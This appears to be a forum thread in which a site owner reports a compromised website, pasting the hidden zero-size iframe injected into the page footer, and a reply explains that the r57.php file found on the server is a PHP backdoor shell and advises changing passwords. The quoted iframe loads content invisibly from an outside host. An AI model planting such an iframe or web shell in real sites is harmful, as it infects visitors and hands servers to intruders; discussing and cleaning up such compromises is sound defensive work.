Hello, i when to my site today and notice that my antivirus keep blocking a url.;
on my webite. after checking i discover a iframe in my footer it was place on the main index.php i also discover a new script on my sever that i did not place there "r57.php" wich my antivirus said is a trojan.. i do not have any clue how they got to my site.

<iframe src="http://h7jejlj0.skottles.com/lib/index.php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Hey Tony,

That's sad to hear. the r57 shell script is a Russian PHP backdoor script that allows a hacker to do just about as much as you can do with your server - if not more. My guess is that someone found out your password to your account. Is there anyway you can check your log files? In any case, change your passwords as soon as possible.

If you want to see how the r57 works, check out http://www.youtube.com/watch?v=ZFQ1PAdI6AY

You may also want to search for c99 which is another PHP based shell.